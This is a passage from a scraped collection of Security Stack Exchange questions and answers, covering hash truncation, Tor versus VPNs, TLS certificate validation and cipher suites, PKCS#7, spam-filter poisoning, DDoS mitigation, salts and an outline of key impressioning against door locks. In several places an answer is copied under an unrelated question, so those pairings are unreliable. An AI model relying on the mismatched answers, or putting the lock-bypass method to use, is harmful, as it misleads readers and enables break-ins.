(with a buffer overflow) when they are checked the program will fail. This would not enable the execution of your buffer. | {
"source": [
"https://security.stackexchange.com/questions/72653",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/34749/"
]
} |
72,673 | I'm wondering how bad it is to truncate a SHA1 and only compare, say, the first 10/12 bytes, etc.
I'm working with a fixed length of 8 bytes that I need to hash for uniqueness but store with the smallest footprint possible (8 other bytes would be nice, but I guess not feasible). A bit more information without sacrificing professional secrets: Some blackbox take a 8 byte value, transforms it and transmits it to a server, where it is checked for validity against a table of know items. Neither the blackbox nor the server should be able to know the original 8 bytes. Best solution would be some kind of 1 to 1, one way relation, like asymmetrical encryption. But I don't think any encryption mechanism outputs so little bytes. | There is no absolute answer, because it depends on the attack model . By truncating the hash, you make some operations easier; this is bad if the attacker wants to perform these operations, and making them easier actually makes them feasible . There are three main characteristics that cryptographic hash functions try to fulfil: Resistance to preimages: given x , it should be infeasible to find m such that h(m) = x . Resistance to second preimages: given m , it should be infeasible to find m' ≠ m such that h(m) = h(m') . Resistance to collisions: it should be infeasible to find m' ≠ m such that h(m) = h(m') . For a perfect hash function that has an output of n bits, costs of finding preimages, second preimages or collisions will be, respectively, 2 n , 2 n and 2 n /2 . By truncating the hash output, you lower these costs correspondingly. As a rule of thumb, a cost of 2 64 is very hard (feasible, but it takes more than a dozen PC) and 2 80 is infeasible. In your case, if a collision is interesting for the attacker, and he gets to choose what is hashed, then the attacker will try to input two data elements that imply a hash collision (on your truncated hash). Truncating to 12 bytes makes the attack quite feasible, easy if you go down to 8 bytes. On the other hand, if all the attacker can do is to try to find some data element matching a given truncated hash (second preimage), then at 10 or 12 bytes this is still too hard to be feasible, and at 8 bytes it is merely "very expensive" (so probably not worth the effort). If there is no attacker and you are just fighting bad luck, then truncating to 8 bytes incurs the risk of spurious collisions; you should reach your first collision after (on average) entering a few billions of entries. Depending on your situation, this may or may not be tolerable. | {
"source": [
"https://security.stackexchange.com/questions/72673",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/60543/"
]
} |
72,679 | I can't quite figure out the differences between using the Tor browser and using a VPN (like concretely proXPN). From what I understand the idea is the same, that they both hide the IP address. The only difference that I can see is that Tor seems slower because it has to pass through several computers. So is using the Tor browser better in terms of hiding your identity and online traffic? Is there a difference between who can see your traffic? (I am guessing that there is a difference.) (I see this question Which is more secure - a VPN, a proxy-server, Tor, etc.? And why so, exactly? was closed as being too broad, but I hope my question is a bit more concrete.) | TL;DR Tor provides anonymous web browsing but does not provide security. VPN Services provides security (sort of) and anonymity, but the anonymity might be more in question depending on the service. Since you're depending on them not logging pieces of information that may or may not be able to be traced back to you. VPNs Traditional A traditional Virtual Private Network does not extend your ISP. A VPN extends an existing private network across a public network. For example, let's say my company has a private network with email servers, web servers (intranet), and DNS setup for company related services. It's a private network for company employees only. However, some employees want to work from home. A VPN is set up so that employees can securely connect to the private network remotely. This provides two features: Authentication - Users present their credentials to gain access to the VPN Encryption - The entire tunnel between the remote user and the private network's gateway is encrypted. Take that last statement: "The entire tunnel between the remote user and the private network's gateway is encrypted." Once you're through the gateway, communication is un-encrypted. Unless the services within the private network itself use another means of secure communication. Keep in mind that no anonymity is provided by this setup. In fact, the company knows exactly what IPs are connecting to its private network. VPN Services Nowadays VPN seemingly takes on many meanings, and online/cloud/[insert Internet buzzword here] have complicated things. We see questions now, "Which VPN takes your anonymity seriously?" What has happened is that VPN Services have become a kind of "secure anonymity service". A service will provide secure communications to a proxy server that will then dump your communication out into the clear to whatever your destination. This is kind of like what a traditional VPN does, except now the statement of "a VPN extends your ISP" is kinda true. Now you're just encrypting the first half of your communications. It extends in the sense that you can access websites and services you might not normally be able to due to your geographic location. But "extends" really isn't the right word to use. Take ExpressVPN for example, it advertises the following: Encrypt your Internet traffic and hide your IP address from hackers and spies. Access any website or app without geographic restrictions or censorship. Take out "Encrypt your Internet traffic" from the first statement, and you basically have an anonymous proxy. But now that the tunnel is encrypted it's a VPN to your anonymous proxy (gateway) that then forwards your traffic on, into the public Internet. Tor Browser Onion Routing Onion routing was designed to provide complete anonymity to a connection. It accomplishes this with encryption. Three layers of encryption. When using the Tor Network a path is determined with a minimum of 3 nodes (can be more). Encryption keys are setup and exchanged between you and all three nodes. However, only you have all of the encryption keys. You encrypt your data with each of the nodes' keys starting with the last node's (exit node) and ending with the first (entry node). As your data moves through the network a layer of encryption is peeled off and forwarded to the next node. As you can see the exit node decrypts the last layer, and forwards your data to its destination. Which means your data is in "plaintext" 1 at this time, but complete anonymity is accomplished. With at least 3 nodes no node knows both the source and destination. Anonymity not Security Tor does not promise secure communications. Encryption is only used to provide anonymity between nodes , your data is not encrypted otherwise. This is why it is still highly encouraged to use HTTPS-enabled websites while using Tor. As @LieRyan mentioned in another thread's comment, sending personally identifiable information through Tor without using other security measures will break any anonymity that Tor provides. Traffic Visibility As far as traffic visibility if there is an admin on the network they will be able to see your traffic. Let's take a situation with a VPN: you have your remote laptop R and your private network gateway/secure anonymous proxy (G). Now you have a private network IP that is encrypted from R to G. A network admin sitting on G can see your plaintext 1 . As stated above if you are using another secure protocol like SSL/TLS through the VPN/VPN Service then the "plaintext" is really encrypted, and the network admin would not see anything but encrypted data. So this really depends on where the network admin is sitting in the connection, and whether or not you use a secondary secure protocol underneath the VPN. This same logic applies to Tor. Because as I stated earlier encryption is only used for purposes of maintaining anonymity. Both traditional VPNs and VPN services are to protect against external visibility into the network. Neither of them will protect you from authorized administrators for the network you're on . It's all about protecting your data from unauthorized eyes. Even with SSL/TLS, a website that you're visiting sees your decrypted traffic. It has to in order to process the request. Admins on that website can see those same requests and/or log them. It's the security protocols used initially and in between that make the biggest difference in the security of communication. 1 It's plaintext as far as the data that was sent is seen here. If the data is encrypted with something like SSL/TLS before going through the onion routing then the encrypted data would be seen at this point. | {
"source": [
"https://security.stackexchange.com/questions/72679",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/10435/"
]
} |
72,866 | We've recently implemented WS Trust security over SSL for our client / server communications. Our application is used by thousands of our customers, spread out all over the world. One of the problems we've had in the past with secure communications is that customers with unsynchronized clocks have difficulty connecting, resulting in customer calls and frustration. Unfortunately, the reaction that has caused in the past is to simply disable this check or simply increase the acceptable clock skew to near infinite amounts. I do not want the security of our system to be compromised, nor do I want to trigger an influx of complaints of customers who do not have their clocks closely in sync with the time on our servers (which are synced to internet time). In order for me to prevent the synchronization check from effectively being disabled, I must first be able to explain to my managers why this is a bad idea, and why the benefits of clock synchronization outweigh the cost of customer complaints or confusion. What role does clock synchronization play in SSL communications and what sorts of vulnerabilities does disabling it introduce? What is typically considered to be the maximum acceptable range for clock synchronization in secure customer facing applications? | In SSL, clocks are used for certificate validation . The client needs to make sure that it talks to the right server; for that, the client will validate the server's certificate. Validation implies verifying a lot of things; two of them involve clocks: The server's certificate (and all involved CA certificates) must include the present time in their validity time range. Each certificate as a notBefore and a notAfter fields; the current time must fall between these two dates. The client is supposed to obtain the revocation status of each certificate, by obtaining (and validating) a CRL (Certificate Revocation List) from the appropriate issuers (the CA). A CRL is deemed acceptable if (in particular) it is "not too old": again, the CRL has a thisUpdate field that says when it was produced, and a nextUpdate field that more-or-less serves as expiration date for the CRL. If the client's clock is off, then it will break either or both of these functionalities. For instance, the server's certificate will be considered as "long expired", or "not usable yet", leading to rejection. Accepting that the client's clock is off means that the client is modified to disregard dates in certificates and CRL. The ultimate consequence for security is that if an attacker succeeds in stealing the private key of a server, then that attacker will be able to impersonate that server forever. The point of revocation is to have a verified method to recover from such a compromise; and the point of certificate expiration is to keep CRL from growing indefinitely. If clients disregard revocation and/or expiration, then the raw consequence is that once a compromise happens, then you are doomed forever . Which is usually considered to be a bad thing. On a brighter note, this is a problem for clients, not for the server. If you operate the server, then it is the client's job , not yours, to validate your certificate properly. If the client really insists on doing things insecurely and being vulnerable, then you cannot really prevent it, at least not technically (you can do things contractually : if the client's incompetence allows for a breach, the client should pay for it). On a similar note, if the clients can talk to your server, then they are connected to some sort of network, meaning that Internet-based time synchronization is a possibility. Requiring an accurate clock is challenging for some embedded devices, but it should not be for networked computers (including smartphones). | {
"source": [
"https://security.stackexchange.com/questions/72866",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/60743/"
]
} |
72,926 | Is TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 a safe cipher suite to use for a TLS 1.2 connection to a Tomcat server? What are potential weaknesses or better alternatives? I am looking for a cipher supported by Java 8. | TLS ciphersuite names are structured in such a way that you can tell what algorithms and key sizes are used for each part of the handshake and encrypted session. Let's break this one down and see if there are any improvements we can make: TLS - This doesn't signify anything in itself, but does allow me to mention that TLS 1.2 is the latest version of TLS and does not have any known vulnerabilities. ECDHE - Elliptic Curve Diffie-Hellman with Ephemeral keys. This is the key exchange method. Diffie-Hellman key exchanges which use ephemeral (generated per session) keys provide forward secrecy, meaning that the session cannot be decrypted after the fact, even if the server's private key is known. Elliptic curve cryptography provides equivalent strength to traditional public-key cryptography while requiring smaller key sizes, which can improve performance. Additionally, they serve as a hedge bet against a break in RSA. RSA - The server's certificate must contain a RSA public key, and the corresponding private key must be used to sign the ECDHE parameters. This is what provides server authentication. The alternative would be ECDSA, another elliptic-curve algorithm, but you may be restricted by the types of certificates your CA will sign. AES_128 - The symmetric encryption cipher is AES with 128-bit keys. This is reasonably fast and not broken (unless you think NSA has backdoored AES, a topic for another time). Other than AES_256 (which may be too costly performance-wise), it's the best choice of the symmetric ciphers defined in RFC 5246 , the others being RC4 (which has some known weaknesses and may be broken relatively soon) and 3DES_EDE (which only has a practical bit strength of 108 to 112, depending on your source). CBC - Cipher Block Chaining mode. Here's where you can probably improve your choice. CBC mode is a way of employing a block cipher to encrypt a variable-length piece of data, and it has been the source of TLS woes in the past: BEAST, Lucky-Thirteen, and POODLE were all attacks on CBC-mode TLS. A better choice for performance and security is AES_128_GCM, which is one of the new AEAD ciphers introduced in TLS 1.2 and has good performance and security characteristics. SHA256 - This is the hash function that underlies the Message Authentication Code (MAC) feature of the TLS ciphersuite. This is what guarantees that each message has not been tampered with in transit. SHA256 is a great choice, and is the default hash algorithm for various parts of TLS 1.2. I'm pretty sure that using SHA-1 would be OK here, since the window for exploitation is so much smaller than, e.g. the certificate signature. AEAD ciphersuites are authenticated to begin with, so this additional MAC step is not needed or implemented. Essentially, you have chosen a good ciphersuite that doesn't have any practical problems for now, but you may wish to switch to an AEAD ciphersuite (AES-GCM or Bernstein's ChaCha20-Poly1305) for improved performance and protection against future CBC-related vulnerabilities. | {
"source": [
"https://security.stackexchange.com/questions/72926",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/60799/"
]
} |
73,156 | Am I correct calling file with .p7b file extension saved as 'Cryptographic Message Syntax Standard - PKCS#7 Certificates (.P7B)' in Windows - a 'PKCS#7 certificate'? Or is it better called 'X.509 certificate saved in PKCS#7 format'? When would one choose one certificate format over another? Do these formats have any particular strengths or weaknesses? Adding this question after my first two edits. How is PKCS#7 format different compared to DER/PEM file formats? Thanks Edit #1: Firefox under Linux offers me an ability to export some website's certificate as: X.509 Certificate (PEM) X.509 Certificate (DER) X.509 Certificate (PKCS#7) Does it mean that PKCS#7 here is just a binary file format similar to but distinct from DER? If true then .p7b file is just an X.509 certificate saved in PKCS#7 format (as opposed to PEM or DER formats). Edit #2: Follow up to my first edit. This page OpenSSL: Documents, pkcs7 suggests that PKCS#7 can be encrypted in either DER or PEM. From that I deduce that PKCS#7 is not a distinct binary file format. Now I'm totally confused. Edit #3: Ok, I figured the relationship between PEM and DER formats. The Base64 encoded payload of the PEM file is actually data in DER format. So initially the X.509 certificate is encoded in DER format and then optionally you can encode the resulted 'DER encoded certificate' to 'PEM encoded certificate'. I'm still having difficulties fitting PKCS#7 part of the puzzle. Edit #4: Another piece of information. PKCS#7 seems to be a container that allows to bundle together several X.509 certificates prior to encode them into DER format (which is different from PEM format where you can bundle certificates together in the same file by just pasting them one after another). | You've evolved to mostly right, but to add several points
and expand on @CoverosGene' answer more than I felt comfortable doing in an edit: X.509 defines a certificate (and some other things not relevant here) in ASN.1,
a (very!) general data structuring method which has several defined encodings, of which DER Distinguished Encoding Representation is quite common and is used here. PEM format -- for several types of data of which a certificate is only one --
is much as you say just binary (DER) data encoded in base64 (edit) broken into lines normally every 64 chars (but there are variations), plus header and trailer lines
consisting of dashes + BEGIN or END + the type of data, in this case CERTIFICATE + dashes.
Those lines look redundant to a human but they are expected and mostly required by software.
PEM (Privacy Enhanced Mail) was actually a complete standard for secure email that has now
been mostly forgotten (see below) except for its encoding format. (edit) As of 2015 there is RFC 7468 describing in detail most use of 'PEM' formats for modern crypto data. PKCS#7 was defined by RSA (the company, not the algorithm) as a multi-purpose format
for encrypted and/or signed data. It was turned over to IETF and evolved into CMS Cryptographic Message Syntax in RFC 2630 , then RFC 3369 , then RFC 3852 , then RFC 5652 ,
hence the wording of the Windows (inetopt) prompt. "PKCS#7" is often used to mean both the original RSA PKCS#7 and the IETF successor CMS, in the same way "SSL" is often used for
both the original Netscape protocol and the IETF successor TLS Transport Level Security. The .p7b or .p7c format is a special case of PKCS#7/CMS: a SignedData structure containing
no "content" and zero SignerInfos, but one or more certificates (usually) and/or CRLs (rarely).
Way back when this provided a standard way to handle (edit) the set of certificates needed to make up a chain (not necessarily in order). PKCS#7/CMS is (are?) also ASN.1 and depending on circumstances can be either DER or BER ,
a closely-related encoding with some very minor differences that most DER decoders handle. While PKCS#7/CMS like any DER or BER object can be PEM-formatted, I've not seen any implementation other than
openssl (edit) it is rare for certs. (Java CertificateFactory can read PKCS7/CMS-certs-only from DER or PEM, but CertPath.getEncoded writes it only to DER.) In contrast both DER and PEM formats for a single cert are common. PKCS#7/CMS is also used as the basis for S/MIME secure email (multiple rfcs starting from 5751).
Basically PEM encoded PKCS#7 into ASCII text which email systems of the 1980s could easily handle, while
S/MIME represents CMS as MIME entities which are encoded in several ways modern email systems can handle. OpenSSL confused matters by implementing, in order: a pkcs7 command which handles
the certs-CRLs-only case not full PKCS#7; a crl2pkcs7 command which actually handles
CRLs and certs, but again not the rest of PKCS#7; a smime command which actually handles both S/MIME
and PKCS#7/CMS for most cases of encrypted and/or signed messages; and a cms command which actually handles
both S/MIME and PKCS#7/CMS for a more complete set of cases. So I would describe the options as: a cert in PEM or DER format; a (single) cert
in a PKCS#7 container or for short just p7, and mention PEM only in the rare case it applies;
or a cert chain in PKCS#7 or p7. The semantic difference between a single cert and a cert chain
is at least as important as the format difference between a cert by itself or in a container. And this doesn't even reach the widespread confusion between a certificate by itself (for some other entity, most often a CA root or anchor) and the combination of privatekey PLUS certificate -- or usually chain -- that you use to prove your own identity, for example as an SSL/TLS server or when signing S/MIME email. That uses the originally-Microsoft PFX Personal Information Exchange format, or its standardized form PKCS#12 or "p12". | {
"source": [
"https://security.stackexchange.com/questions/73156",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/37967/"
]
} |
73,181 | This answer mentions Bayesian poisoning in passing and I've read the wikipedia page but don't feel I've fully grasped it. The first case, where a spammer sends a spam with a payload (link, malicious file, etc) and includes lots of non-spammy "safe" words seems obvious enough. The aim is to bring up the rating of that individual email so that spam filters might class it as "not spam". The second case is more subtle and (to me) confusing: Spammers also hope to cause the spam filter to have a higher false positive rate by turning previously innocent words into spammy words in the Bayesian database (statistical type I errors) because a user who trains their spam filter on a poisoned message will be indicating to the filter that the words added by the spammer are a good indication of spam. How does this help the spammer? Sure, false-positives (if I've understood correctly that this means legitimate emails wrongly classed as spam) are annoying, but they would have the be very common to disable spam filters entirely. It doesn't seem like this would change the rating of real spammy words, or does it just affect their relative rating? Finally, does this, or any other, approach help an individual spammer with a particular few spam words they'd like to sneak through the filters, or would it potentially help all spammers? Could someone provide or link to an example-based explanation? | There's a good paper published named Bachelor thesis:The Effects of Different Bayesian Poison Methods on the Quality of the Bayesian Spam Filter ‘SpamBayes’ by Martijn Sprengers. I'll try to make TL;DR: Bayesian spamfilters try to decide if an email is spam or not by looking at keywords in an email. What it does is review the words present in normal and spam email and update the scores for each word. These scores are used to deduce if an email is spam or not by making a score based on the overal score of words present in the email. Words are re-scored, meaning that if "Viagra" appears in several normal emails, it will get a lower score over time. This is abused by spammers by generating email with several low scoring words, commonly found in legitimate emails and adding a single bad word. Because the score of the email will overall be considered good "Viagra" will get a lower score over time making it a legitimate word, and causing spam email to pass through spam filters. There are three attacks the paper discusses: Random Words: This attack method is based on the research by Gregory et
al. [6]. It can be seen as a weak statistical attack, because it uses
purely randomized data to add to the spam e-mails. Common Words: This attack method is based on the research by Stern et al. [7]. They added common English words to spam e-mails in order
to confuse the spam filter. This attack can be seen as stronger
statistical attack than the Random Words method, because the data used
is less random and it contains words that are more likely to be in
e-mails than the words added with the previous attack. Ham Phrases: This attack is developed in this research and tested against the other two. It is based on a huge collection of ham
e-mails. From that collection, only the ham e-mails with the lowest
combined probability are used as poison. The ham e-mail is then added
at the end of the original spam e-mail. Most people read downwards, so
the effectiveness of the message is maintained. This is also a strong
statistical attack, maybe even stronger than the Common Words attack,
because the words are even less randomized. Highlights from the paper's conclusion: From a spammer’s point of view, the ‘HamPhrases’ technique seems to work best. It does decrease the performance of the spam filter. … The ‘Random’ and ‘Common Words’ techniques seem to score worse from a spammers point of view. … When we train the spam filter on those poison methods, the performance gets even better than normal. … However, the HamPhrases method used in this research is a little bit cheating. This is because both ham and spam e-mails that the spam filter uses for testing and training are available for the algorithm. Real spammers do not have the ham e-mails of real users. | {
"source": [
"https://security.stackexchange.com/questions/73181",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/34123/"
]
} |
73,258 | Is it possible to get the salt if I have the hash and original password? My gut feeling is no, but would it be impossible or will it just take very long? | Getting salt from hash(salt+password) would be just as difficult as getting password from hash(salt+password) . | {
"source": [
"https://security.stackexchange.com/questions/73258",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2625/"
]
} |
73,369 | As far as I know, I have never heard of or seen any large scale web sites like Amazon, Microsoft, Apple, Google, or Ebay ever suffer from DDoS. Have you? I have a personal philosophy that the bigger you are, the more of a target you are for such attacks. Imagine the brownie points you would get if you could bring down a major website. Yet, such sites have always remained sturdy and seemly invincible. What security measures have they implemented and can these be applied to smaller businesses? | They generally have a very layered approach. Here are some things I've either implemented or seen implemented at large organizations. To your specific question on smaller businesses you generally would find a 3rd party provider to protect you. Depending on your use case this may be a cloud provider, a CDN, a BGP routed solution, or a DNS-based solution. Bandwidth Oversubscription - This one is fairly straightforward. As you grow larger, your bandwidth costs drop. Generally large organizations will lease a significantly larger capacity than they need to account for growth and DDoS attacks. If an attacker is unable to muster enough traffic to overwhelm this, a volumetric attack is generally ineffective. Automated Mitigation - Many tools will monitor netflow data from routers and other data sources to determine a baseline for traffic. If traffic patterns step out of these zones, DDoS mitigation tools can attract the traffic to them using BGP or other mechanisms and filter out noise. They then pass the clean traffic further into the network. These tools can generally detect both volumetric attacks, and more insidious attacks such as slowloris. Upstream Blackholing - There are ways to filter UDP traffic using router blackholing. I've seen situations where a business has no need to receive UDP traffic (i.e. NTP and DNS) to their infrastructure, so they have their transit providers blackhole all of this traffic. The largest volumetric attacks out there are generally reflected NTP or DNS amplification attacks. Third Party Provider - Even many fairly large organizations fear that monster 300 Gbps attack. They often implement either a DNS-based redirect service or a BGP-based service to protect them in case they suffer a sustained attack. I would say CDN providers also fall under this umbrella, since they can help an organization stay online during an attack. System Hardening - You can often configure both your operating system and your applications to be more resilient to application layer DDoS attacks. Things such as ensuring enough inodes on your Linux server to configuring the right number of Apache worker threads can help make it harder for an attacker to take down your service. | {
"source": [
"https://security.stackexchange.com/questions/73369",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55609/"
]
} |
73,402 | Apart from SPF, what else can be done to stop hackers from spoofing your company's email addresses? | Set up Domain Keys Identified Mail on your own domain. That will digitally sign legitimate outgoing from your domain. More and more email providers are rejecting or flagging spoofed email where legit email is identified with a Domain Key signature. Your question says, "apart from SPF..." and that's what I answered. However, for others who might use this answer, SPF is another deterrent. It is easy to set up, but has some limitations that should be considered carefully. You probably want to start with a SOFTFAIL policy. | {
"source": [
"https://security.stackexchange.com/questions/73402",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/4508/"
]
} |
73,406 | I was about the Spring Security framework 's CSRF protection to see how it works. Spring doesn't use the double-submit pattern, but instead associates the CSRF token with the user's session. The documentation includes the following explaining why that is: One might ask why the expected CsrfToken isn’t stored in a cookie. This is because there are known exploits in which headers (i.e. specify the cookies) can be set by another domain. [...] See this webappsec.org thread for details on how to perform the exploit. The gist of what the webappsec.org thread says is: Attacker puts Flash document on attacker-controlled website, user visits it Flash app makes a same-origin request to the attackers website which sets the target header, and this is permitted by the crossdomain.xml on the attacker's website The attackers website responds to this request with a 302 or 307 redirect to the target website Flash (in "certain circumstances") ignores the target website's crossdomain.xml and makes the request to the target website with the extra header included My question is: is this a valid concern? I was unable to reproduce the problem by following the steps in the webappsec.org thread, and furthermore it sounds like this was a straight-up bug in Flash itself rather than any vulnerability with the double-submit cookies pattern. Although this problem resulted in at least two CVEs against web application frameworks I could not find any corresponding bug filed for Flash - but it seems like either it has been fixed since, or I was not correctly reproducing the unspecified "certain circumstances" under which this happens. | Set up Domain Keys Identified Mail on your own domain. That will digitally sign legitimate outgoing from your domain. More and more email providers are rejecting or flagging spoofed email where legit email is identified with a Domain Key signature. Your question says, "apart from SPF..." and that's what I answered. However, for others who might use this answer, SPF is another deterrent. It is easy to set up, but has some limitations that should be considered carefully. You probably want to start with a SOFTFAIL policy. | {
"source": [
"https://security.stackexchange.com/questions/73406",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/278/"
]
} |
73,451 | Posting systems are vulnerable to virus and worms and having an antivirus is almost necessary. How is it possible that hardware antiviruses don't exist? The idea sounds pretty good, if the antivirus resides on reprogrammable chips similar to the one that hosts the BIOS, then it would be immune to attacks yet still upgradeable. Also it would have higher privileges and that would solve the problem of being unable to repair in-use system files. Is there something I am not thinking of that makes this impossible to implement? | If the chip is writable from within the OS, the malware can write to it too, so it wouldn't help there. Also, anti-malware software has to handle threats that are only a few hours old. Having to reboot your computer to upgrade the anti-malware software that's running on its own hardware would suck, so we need to be able to upgrade it from within the OS. If we can write to the chip from the OS, so can the malware. In order to make a secure hardware anti-malware you first have to change the main task of the program. Anti-malware software basically have a list of malicious software. If a program is in that list, it's blocked and removed. If not, we let it run. Every time a new piece of malware is written we have to add it to the list. Thus, the software can only be reactive, with the need to update the (huge) list all the time.
If, on the other hand you have a list of programs that are allowed to run and block everything else you don't need to update that list all the time; only when you want to run a new program. Any malware, unknown or well known, would be blocked by this implicit deny. For many sensitive environments you don't install new code every day. ATM's need to run one piece of software. Nothing else. The list basically wouldn't change. The problem is that there is no generally feasible list of OK programs. You'd either have to have a relatively small list of the programs you need to be able to run on your computer, which has to be made specifically for you, or you'd have to have an enormous list of any programs that anyone would ever want to run. To generate that list, the easiest would be to add every possible program, and remove all the bad ones, which is equivalent to what anti-malware software does today, rather that the implicit deny. You simply cannot get a list of all non-malicious programs that will ever be written without including ones that won't be. It could work, if you do it right. But it's generally not feasible. Also, it would really be a terrible thing to change to implicit deny for anti-malware companies trying to sell subscription services. As for the extra privilege level; sometimes you have to escalate privilege, and if you can, malware will. And the inability to edit system files, you just added another layer. The top layer will still have that problem. | {
"source": [
"https://security.stackexchange.com/questions/73451",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/31356/"
]
} |
73,476 | I just noticed something weird in my browser: the certificate for www.google.com has been issued by avast! Web/Mail Shield Root . Should I be worried? I am using avast! Antivirus so it's probably a built-in feature, but I don't know why this is happening and what the benefits/risks are. | The whole goal of HTTPS is to prevent eavesdropping so that anyone monitoring your web traffic can't see what you're sending. As useful as it is, HTTPS presents a bit of a problem to antivirus software because when you visit sites over an encrypted connection, your antivirus software cannot see what sites you're visiting or what files you're downloading, at least until the download finishes. This presents a risk because if you download a virus, the antivirus software won't know about it until the download is finished and the virus is already saved to your hard drive, allowing criminals to bypass the "live defense" features of AV by simply hosting the malware on an HTTPS site. The solution that many antivirus programs use is to install its own SSL certificate as a root certificate so that it can essentially man-in-the-middle all HTTPS traffic to scan for malware. I'm guessing this is what avast! is doing. Whether this behavior presents additional security issues is debatable but I don't think it's something you need to be deeply concerned about - after all, your own antivirus software is doing the man-in-the-middling, not a malicious party. If it worries, you, you can disable this behavior - go to Settings>Active Protection>Web Shield>click on "customize" and tick the box next to "Disable HTTPS scanning." If you do this, avast! won't be able to proactively block malware on HTTPS sites. | {
"source": [
"https://security.stackexchange.com/questions/73476",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/10074/"
]
} |
73,579 | I have a space for computers secured with a simple deadbolt. Someone keeps coming to pick the lock. While working there, I have scared them away three times. There are cameras, but not in useful places or all exits and the building manager won't let me run wires for more. I contacted the police, but maybe it is a low priority for them. With each subsequent visit, does a lock picker gain further progress in undermining the door's ability to keep out? Could they be doing something to the door each time that is getting them closer to being able to open the lock really quickly? Is there anything I can do to stop their ability to pick the lock? | Yes, there's a classic attack that involves incremental access. The attacker starts out with a blank key that fits into the lock in question. The attacker approaches the door, puts the key in, jiggles the key a bit, grumbles something about how the office numbers changing, and leaves. Then in private he examines the impression pattern on the key. Where there's evidence that the pins were bound, he files the key down a bit. Every day he visits the door with his increasingly-filed-down key, and every day he progressively files it down a bit more, using the impression pattern in the key as his guide. Then, one day, he'll have filed the key to match all of the pins, and the door will open. This attack has the advantage that it doesn't look like an attack. It just looks like a lost tenant who briefly visits the wrong door, and then leaves once he's realized his mistake. And when he's done, he'll have a working key. | {
"source": [
"https://security.stackexchange.com/questions/73579",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55069/"
]
} |
73,588 | Suppose we have passwords that are statistically 7-8 characters long. Is appending a 200 character long salt less secure than a 5 character salt, because of the similar hash function inputs? I was wondering: what if someone tries to guess the salt by brute forcing the salt with for example the password "123456", or another popular password that can be found in the system or even on a known password from the hacker's own account? | As Mike and Gumbo have mentioned in comments, a salt isn't intended to add protection to bad passwords. It's meant to keep the attackers from breaking the whole database at once. The length of the salt isn't meant to add difficulty to breaking the stored passwords. It's meant to ensure that your salt is reasonably unique compared to others on the Internet, and (if you're doing it right) no two of your users will have the same salt. Imagine you have 20 users who all have "god" as their password. Consider the following scenarios: Passwords are unsalted The attacker can use a precomputed table to break one user's password in very short order. On top of that, once he has the first of the 20, he'll also have the other 19 since their hashes would be identical. Passwords are salted. Salt used is fairly short. Same salt is used for all users. The attacker might have to look for a bit, but could possibly come across a precomputed table made specifically for your configuration. After that point, see scenario 1. Passwords are salted. Salt used is reasonably strong. Same salt is used for all users. Chances are, the attacker won't find a pre-computed table for your system on the Internet. He'll have to make one of his own. This will take a bit of extra time. However, after that's done, we're back to scenario 1 again. Passwords are salted. Salt used is reasonably strong. Each user has a unique salt. This is what you should be doing. Not only will the attacker not be able to find a precomputed table for your system, it's not even worth his time to make his own. Any pre-processing he might do would only work against one user. Even if he hits one of the 20 users mentioned earlier, he won't know the other 19 because the hashes will all be different. Each password must thus be individually attacked, and that's going to take awhile if you're also using a strong and slow hashing algorithm like you should be. Chances are, the weak passwords will still end up compromised eventually. It's just going to take the attacker a good bit more time to get through them all, and you won't have chunks of your users getting compromised at once just because they have the same password. So, use long salts and make them unique per-user. But don't count on that to help individual users much if they're using "god" as their password. | {
"source": [
"https://security.stackexchange.com/questions/73588",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/61366/"
]
} |
73,647 | Can JavaScript be used to capture the user’s screen? If so, is this functionality available in any JS framework? (I do not need code examples: I am mainly asking to form an opinion about the security capabilities of JavaScript.) | JavaScript has full access to the document object model, so at least in theory, it could capture what's on its own web page (but not anything outside the browser window) and there's a library to do that: http://html2canvas.hertzen.com/ (I haven't tried it.) The same-origin policy prevents JavaScript from accessing the DOM of another site. Since JavaScript cannot access the DOM of another site, it cannot leak material from the other site. So, if your question boils down to whether a script running in one tab, or even an iframe, can capture the banking password from elsewhere in the browser, then no, provided same-origin is properly implemented in the browser itself. Same origin applies to domain from which the page was served, not from which the script was served. So, my page at hxxp://bbrown.spsu.edu/ (it wasn't interesting, and now it's dead because I've retired) can load a script from google-analytics.com, as it does, and that script has access to the DOM of the page from which it was loaded; it can also send stuff back to Google through a bit of sleight-of-hand. The point is, it can do that only because I trusted Google Analytics enough to load their script in my page; the code that loads the page is in markup I wrote. If you load my page into your browser, that script from google-analytics.com can see only the DOM of my page in your browser, and not anything else you may have open in your browser. | {
"source": [
"https://security.stackexchange.com/questions/73647",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/61416/"
]
} |
73,661 | A previous question, What is the use of cross signing certificates in X.509? described cross-signed certificates well. I have a situation where the clients trust CA1 xor CA2, and both need to reach a single service. Logically, this means I need two end-entity certificates for the same hostname. From a single SSL key, I generated a single CSR and submitted to both CAs, and gotten the two separate end-entity certificates. I configured Apache to serve both certificates together and all relevant intermediates in the chain. What's gotten me stumped is the ability to get Apache mod_ssl crashes hard with [Tue Nov 25 15:28:35 2014] [error] Init: Multiple RSA server certificates not allowed' OpenSSL's s_server reads multiple -cert , -dcert arguments, takes the first RSA certificate in the last argument. Using GnuTLS either via mod_gnutls or directly, either takes just the last certificate or claims The provided X.509 certificate list is not sorted (in subject to issuer order) I think, reading RFC4158, what I'm trying to do should be valid. Where have I gone wrong? Why does cross-signing only seem to be valid among intermediate and root certificates? There is no way ahead of time to differentiate between the clients, so I can't cheat and run different vhosts on different IPs (the clients share DNS). I don't have control over getting both CAs into the clients either. The only working work-around I have so far is to push each group of clients to a unique hostname out-of-band. | JavaScript has full access to the document object model, so at least in theory, it could capture what's on its own web page (but not anything outside the browser window) and there's a library to do that: http://html2canvas.hertzen.com/ (I haven't tried it.) The same-origin policy prevents 